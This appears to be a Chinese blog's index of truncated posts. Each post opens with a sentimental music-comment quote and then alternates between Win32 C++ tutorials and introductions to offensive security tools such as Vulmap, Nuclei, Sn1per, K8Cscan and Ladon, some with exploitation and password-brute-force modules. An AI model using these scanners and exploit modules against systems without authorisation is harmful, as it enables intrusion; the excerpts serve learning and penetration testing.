以前一直不懂，人怎么会依赖一支香烟，后来才明白，在一个人感到烦恼无助的时候，那手指上的一点点光真的很温暖。。。---- 网易云热评一、软件介绍​​R3con1z3r是一个被动的侦察工具，内置的功能包括:HTTP报头标志，Traceroute, Whois足迹，DNS信息，同一服务器上的站点，Nmap端口扫描，反向目标和网页上的超链接。在提供了必要的输入之后，该工具会生成HTML格式的输出。二、下载地址(软件作者)https://github.com/abdu...

以前一直不懂，人怎么会依赖一支香烟，后来才明白，在一个人感到烦恼无助的时候，那手指上的一点点光真的很温暖。。。​---- 网易云热评一、先在窗口画一个圆//定义圆的直径和坐标#define 直径 100int g_x = 100;int g_y = 100;​​case WM_PAINT: 绘图(hWnd); break;​​void 绘图(HWND hWnd){ PAINTSTRUCT p = { 0 };//创建...

好遗憾，明明不想失去，却又无能为力，说真的，那种想放弃又想爱的滋味，真折磨人。。。。---- 网易云热评一、定时器消息1、可以在程序中设置定时器，当到达时间间隔时，定时器会向程序发送一个WM_TIMER消息。2、定时器的精度是毫秒，但是准确度很低。3、例如设置时间间隔为1000ms，但是会在非1000毫秒到达。二、消息的参数1、WPARAM - 定时器ID2、LPARAM - 定时器处理函数的指针三、定时器使用1、创建定时器UINT_PTR Set...

​好遗憾，明明不想失去，却又无能为力，说真的，那种想放弃又想爱的滋味，真折磨人。。。。---- 网易云热评一、插件介绍一个用于检查struts2 RCE漏洞的Burp扩展器二、下载地址（插件作者：prakharathreya）https://github.com/prakharathreya/Struts2-RCE三、安装插件1、将插件导入BurpSuite2、选择下载好的插件3、点击下一步4、导入成功，菜单栏和右击项会多出两个选项...

忙起来的时候感觉什么都不缺，空下来以后才发现什么都没有。。。---- 网易云热评一、基本鼠标消息WM_LBUTTONDOWN - 鼠标左键按下 WM_LBUTTONUP - 鼠标左键抬起 WM_RBUTTONDOWN - 鼠标右键按下 WM_RBUTTONUP - 鼠标右键抬起 WM_MOUSEMOVE - 鼠标移动消息 1、消息参数：WPARAM，其他按键的状态，例如Ctrl..

忙起来的时候感觉什么都不缺，空下来以后才发现什么都没有。。。---- 网易云热评一、软件介绍 Vulmap 是一款 web 漏洞扫描和验证工具, 可对 webapps 进行漏洞扫描, 并且具备漏洞利用功能, 目前支持的 webapps 包括 activemq, flink, shiro, solr, struts2, tomcat, unomi, drupal, elasticsearch, fastjson, jenkins, nexus, weblogic, jboss, spr...

外表干净是尊重别人，内心干净是尊重自己，干净，在今天这个时代，应该是一种极高的赞美和珍贵。。。---- 网易云热评一、新建空项目二、添加新项三、设置系统四、添加窗口框架代码#include <windows.h>HINSTANCE g_hInstance = 0;//接收当前程序实例句柄HANDLE g_输出句柄 = 0;//接收标准输出句柄void 绘图(HWND hWnd){ const wchar_t* str =...

外表干净是尊重别人，内心干净是尊重自己，干净，在今天这个时代，应该是一种极高的赞美和珍贵。。。​---- 网易云热评一、软件介绍Dirsearch是一种命令行工具，可以强制获取web服务器中的目录和文件。二、下载地址git clone https://github.com/maurosoria/dirsearch.git三、使用方法1、安装所需要的库文件pip3 install -r requirements.txt2、输入目标地址python3..

总有一天你会明白，能治愈你的，从来都不是时间，而是心理的那股释怀和淡然。。。。---- 网易云热评一、键盘消息1、键盘消息WM_KEYDOWN:按键被按下时产生 WM_KEYUP:按键被放开时产生 WM_SYSKEYDOWN:系统键按下时产生 比如ALT、F10 WM_SYSKEYUP:系统键放开时产生 WM_CHAR :字符消息(TranslateMessage函数发送的) 2、消息参数 按键消息：WPARAM:按键的...

总有一天你会明白，能治愈你的，从来都不是时间，而是心理的那股释怀和淡然。。。。---- 网易云热评一、软件介绍主要动能：子域名、屏幕截图、端口扫描、JS文件收集、子域的httpx状态码、目录扫描二、下载地址https://github.com/0xdekster/ReconNote三、安装docker环境1、更新APT索引包sudo apt-getupdate2、安装 apt 依赖包，用于通过HTTPS来获取仓库sudo apt-get i...

只要有足够的勇气，和过去的自己告别，生活就会奖励一个新的开始。。。---- 网易云热评一、消息队列1、消息队列用于存放消息的一个队列，消息在队列中先入先出。所有窗口程序都具有消息队列。程序可以从队列中获取消息。2、消息队列的类型系统消息队列：由系统维护的消息队列。存放系统产生的消息，例如鼠标、键盘等。只有一个，系统启动的时候就有程序消息队列：属于每一个应用程序（线程）的消息队列。由应用程序（线程）维护。3、消息队列的关系当鼠标、键盘产生消息时，会将消息存放到系统消息...

只要有足够的勇气，和过去的自己告别，生活就会奖励一个新的开始。。。----网易云热评一、软件介绍Nuclei基于模块来跨目标发送请求，可以对已知路径有效的扫描，主要用在网络侦查的初始阶段，比较好用的一个地方是，在被WAF后还可以自动重传二、下载地址：https://github.com/projectdiscovery/nuclei三、使用方法：1、查看版本信息：nuvlei -version2、更新下载模板：https://github.com/pro...

我知道你最近很累，是那种看不见的身体上精神上的以及对未来的那种无力感，但请一定要坚持下去。。。---- 网易云热评一、消息的获取1、GetMessage：从系统获取消息，将消息从系统中移除，阻塞函数。当系统无消息时，GetMessage会等候下一条消息。2、PeekMessage - 以查看的方式从系统获取消息，可以不将消息从系统移除，非阻塞函数。当系统无消息时，返回FALSE，继续执行后续代码。BOOL PeekMessage( LPMSG lpMsg, ..

我知道你最近很累，是那种看不见的身体上精神上的以及对未来的那种无力感，但请一定要坚持下去。。。----网易云热评一、软件介绍Sn1per Community Edition是一个自动扫描器，可以在渗透测试中用来列举和扫描漏洞二、下载地址https://github.com/oneplus-x/Sn1per三、使用方法1、安装./install.shj2、普通扫描sniper -t 192.168.125.1333、多种模式相结合扫描，有能利用的...

你多少岁不重要，看起来像几岁才重要，不要把辛苦和怨气都挂在脸上，你想要最好的生活，就先让生活看到最好的你。。。。---- 网易云热评一、程序执行机制1、过程驱动 - 程序的执行过程是按照预定好的顺序执行。2、事件驱动 - 程序的执行是无序，用户可以根据需要随机触发相应的事件。3、Win32窗口程序就是采用 事件驱动 方式执行，也就是 消息机制。4、当系统通知窗口工作时，就采用消息的方式派发给窗口。二、消息组成（windows平台下）窗口句柄消息ID 0...

你多少岁不重要，看起来像几岁才重要，不要把辛苦和怨气都挂在脸上，你想要最好的生活，就先让生活看到最好的你。。。。---- 网易云热评一、下载 Metasploitable3下载地址：https://github.com/rapid7/metasploitable3二、下载Packer下载地址：https://www.packer.io/downloads三、下载vagrant下载地址：https://releases.hashicorp.com/vag...

你学不进的东西有人学，你不经历的有人经历，你吃不了的苦有人吃，想让人望而生畏，就要拿出常人百倍的野心去奋斗。。。---- 网易云热评一、窗口类窗口类包含了窗口的各种参数信息的数据结构，每个窗口都具有窗口类，基于窗口类创建窗口，每个窗口类都具有一个名称，使用前必须注册到系统。二、窗口类分类1、系统窗口类 ，比如按钮button，编辑框edit系统已经定义好的窗口类，所有应用程序都可以直接使用。2、应用程序全局窗口类由用户自己定义，当前应用程序所有模块都可以...

你学不进的东西有人学，你不经历的有人经历，你吃不了的苦有人吃，想让人望而生畏，就要拿出常人百倍的野心去奋斗。。。---- 网易云热评​一、软件介绍K8Cscan一款专用于大型内网渗透的高并发插件化扫描神器，包含信息收集、网络资产、漏洞扫描、密码爆破、漏洞利用，支持批量A段/B段/C段以及跨网段扫描。5.4版本内置28个功能模块,通过各种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、网络共享、网卡物理地址、操作系统版本、网站域名、Web中间件、路由器（Cisco）、数据库等网络.

将喜欢的东西留在身边，这就是努力的意义。。。---- 网易云热评一、新建空项目二、右击项目查看属性，修改项目字符集的属性为多字节三、右击项目，添加c++文件四、添加代码，固定的#include <Windows.h>//2、窗口处理函数，第一个窗口句柄，第二个消息消息id,第三个消息参数，第四个也是消息参数LRESULT CALLBACK WinProc(HWND hWnd, UINT msgID, WPARAM wParam, LPAR...

将喜欢的东西留在身边，这就是努力的意义。。。---- 网易云热评一、软件介绍大型内网渗透扫描器&Cobalt Strike，Ladon7.2内置94个模块，包含信息收集/存活主机/端口扫描/服务识别/密码爆破/漏洞检测/漏洞利用。漏洞检测含MS17010/SMBGhost/Weblogic/ActiveMQ/Tomcat/Struts2，密码口令爆破(Mysql/Oracle/MSSQL)/FTP/SSH(Linux)/VNC/Windows(IPC/WMI/SMB/Netbio..

散伙是人间常态，你我又不是什么例外，只是很遗憾，没有成为你的偏爱，你却成为我爱不得的遗憾。。。---- 网易云热评一、切换root用户登录1、sodu su切换为root权限2、passwd root二、安装搜狗输入法1、打开官网下载：https://pinyin.sogou.com/linux/?r=pinyin2、下载路径3、右击打开终端，安装fcitxsudo apt-get install fcitx4、安装输入法sudo ...